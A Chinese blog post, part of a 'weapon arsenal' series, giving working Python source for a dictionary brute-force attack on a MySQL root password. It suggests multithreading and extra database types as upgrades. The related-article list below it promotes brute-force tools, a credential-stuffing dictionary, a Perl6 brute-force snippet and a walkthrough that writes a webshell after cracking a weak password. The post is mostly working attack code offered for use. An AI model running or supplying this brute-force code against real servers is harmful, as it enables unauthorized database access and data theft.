#我的武器库系列#之mysql数据库爆破核心实现

最新推荐文章于 2025-02-02 21:41:13 发布
原创 最新推荐文章于 2025-02-02 21:41:13 发布 · 409 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql爆破 #python爆破

日常业务系统常用数据库如MySQL等,因开发人员安全意识不足,数据库对外权限设置不当,存在安全隐患,渗透人员可利用字典表穷举破解。文章给出了MySQL穷举破解的源代码,并提及可从多线程、多数据库等维度优化,还给出了所用字典表。

       我们日常业务系统常用mysql、sqlserver、oracle、db2等,多数开发人员以功能为导向,缺少安全意识,在设计开发时数据库对外权限没有进行有效设置,导致可通过外部IP方进行连接访问。该问题存在非常大的安全隐患,渗透人员利用字典表通过穷举方式进行暴力破解,一旦渗透成功,危害不言而喻。

   源代码只实现了mysql的穷举破解,sqlserver、oracle类似,不在此复述。

一、源代码


# -*- coding: UTF-8 -*-
import pymysql
def mysqlConnection(url,userName,password,dbName):

    try:
        print("userName:%s,password:%s" % (userName,password));
        # 打开数据库连接
        db = pymysql.connect(url, userName, password, dbName, charset='utf8' )
        # 使用cursor()方法获取操作游标 
        cursor = db.cursor()
        # 使用execute方法执行SQL语句
        cursor.execute("SELECT VERSION()")
        # 使用 fetchone() 方法获取一条数据
        data = cursor.fetchone()
        print ("Database version : %s " % data);
        # 关闭数据库连接
        db.close();
        return True;
    except Exception as e:
       # print(e);
        pass;
def main():
    userName = "root"
    passwordList = open("/Users/wangfeng/Downloads/Blasting_dictionary-master/password.txt"); #字典表
    passwords = passwordList.readlines();
    for password in passwords:
        check = mysqlConnection("127.0.0.1",userName.strip(),password.strip(),"mysql");
        if check :
            print("破解成功,用户名 %s,密码:%s" % (userName,password));
            break;      

if __name__ == "__main__":
    main();

二、优化

      本系列只是相关功能的核心实现,未考虑过多的技术细节及功能,在基于本代码的前提下,我们可以从多线程、多数据库、字典表等多个维度着手进行完善。本系列所用字典表为:Blasting_dictionary-master(有些老,传送门)。

 

 

[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
[网络安全自学篇] 八十九.PE文件解析之通过Python获取时间戳
杨秀璋的专栏
07-23 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了基于机器学习的恶意代码检测技术,包括机器学习概述与算法举例、基于机器学习方法的恶意代码检测、机器学习算法在工业界的应用。这篇文章将尝试软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源,但也存在局限性。文章同时也普及了PE文件分析和APT溯源相关基础,基础性文章,希望对您有所帮助~
CTF攻防世界小白刷题自学笔记9
weixin_52990944的博客
09-29 993
题目来源:Cyberpeace-n3k0题目描述:X老师今天上课讲了前端知识,然后给了大家一个不能按的按钮,小宁惊奇地发现这个按钮按不下去,到底怎么才能按下去呢?Web方向新手模式第10题。打开题目场景一看果然有一个不能按的按钮,如图。一想到这道题考前端知识,就想到要打开开发者模式看网页设计,按F12,发现按钮这里有个disabled,直接删了。删完按钮就可以按了,按完答案就出来了。
CTF-Web入门wp-XCTF-(1-12)
LH1013886337的博客
10-10 1296
本人也是刚入门ctf-web系列,写一点wp另外提供两个学习ctf的网站和。
mysql数据库暴破
04-08
该资源为python编写的mysql暴力破解软件,采用多线程编写,爆破速度非常快。
Blasting_dictionary-master.zip
06-17
暴力破解字典库,撞库专用。配合Burp使用,实用性很高。各位大佬,需要的下载。 字数咋还不够...凑字数专用。
利用burp suite进行弱口令爆破 (攻防世界web weak_auth)
Kni9hT's Blog
02-28 5456
终于刷到这种题了,做二进制的时候用过python爆破… 用burp suite跑字典还是第一次。 那就从这个简单的字典爆破开始吧。 利用工具: burp suite Blasting_dictionary-mastergithub字典 爆破环境: kali linux 正题开始 题目叫做weak_auth,翻译过来就是弱口令爆破 打开是一个登陆界面,username和password都使用a...
mysql数据库爆破_mysql数据库密码爆破
weixin_39562340的博客
02-28 1999
mysql忘记密码爆破思路:1,停止mariadb服务2,跳过授权启动数据库进程3,重设管理密码4,关闭mysql——safe进程5,启动mariadb服务5,验证新密码步骤:1,停止mariadb服务[root@svr7 ~]# systemctl stop mariadb2,跳过授权启动数据库[root@svr7 ~]# mysqld_safe --skip-grant-tables &amp...
弱口令-爆破Mysql
HAKUNAMATATATTA的博客
11-28 2402
mysql弱口令爆破工具 不仅仅是MySQL
一款图形化弱口令爆破工具,支持ftp,rdp,ssh,smb,vnc,redis,mysql,mssql,oracle等爆破攻击
最新发布
2202_75361164的博客
02-02 612
一款图形化弱口令爆破工具:week-passwd支持:ftp,rdp,ssh,smb,vnc,redis,mysql,mssql,oracle,telnet,tomcat,mongodb,weblogic.postgresql等爆破攻击下载地址在文末。
2024年网络安全最新渗透武器库---信息收集工具大全(1)
2401_84302507的博客
05-03 1676
域名按照层级可以分为顶级域、主域名、子域名等。例如.net 是顶级域,主域名是taibai.net,子域名则是在主域名的前面添加自定义名称,例如像 api.taibai.net 、mail.taibai.net 这一类都可统称为子域名。(类似手段非常多,当前举例几种)1IP反查地址:https://tools.ipip.net2人工查看https证书证书 – 详细信息 – 使用者可选名称3DNS A记录。
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
超级代码万能爆破数据库
11-11
数据库爆破代码,亲测可用,主要用于中小型网站,大站不建议使用
mysql密码破解工具
10-01
mysql的密码破解工具,以及使用教程,mysql修改密码不再困难
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
热门推荐
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
mysql爆破python脚本
m0_73896875的博客
07-06 338
print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")@Author :星之尘。
Python mysql 爆破
weixin_34161029的博客
05-13 379
缺点:不支持网段单线程#-*-coding:utf_8-*- #Date:2015/5/13 #author:sanr importMySQLdb importos importsys defREADME(): print'+'+'-'*50+'+' print'\tPythonMySQL爆破' ...
mysql弱密码爆破及利用方法
m0_75198157的博客
04-08 735
linux kali2021中已经安装了mysql,所以可以在终端中使用mysql命令登录。在windows中,如果安装了mysql,在mysql/bin/mysql.exe。3、利用我们爆破出的用户名和密码,使用mysql客户端登录远程mysql服务器。执行成功后,可以用 菜刀连接,打开flagvalue.txt文件。可以看到:默认端口3306 默认用户名:root。需要在mysql服务器上开启写入文件的权限。这个变量默认的值是空值,表示不允许写入。修改目录的权限为完全的权限。
一个简单的爆破 mysql 远程连接脚本(perl6)
weixin_30314631的博客
01-18 264
sub MAIN(Str $host) { use DBIish; my $file = open 'password.txt'; while $file.get -> $line { my $password = $line.chomp; say 'Guess: '~$password; #错误处理 try { ...
掌握Oracle MySQL 5.7的核心七种武器
标题中提到的“姜承尧-Oracle MySQL 5.7 七种武器”,意味着我们将探讨姜承尧先生针对Oracle MySQL 5.7版本所介绍的七个高级特性、技巧或工具,这些可以视为优化和提升数据库性能的“武器”。由于具体的内容细节没有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

登峰造Geek

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值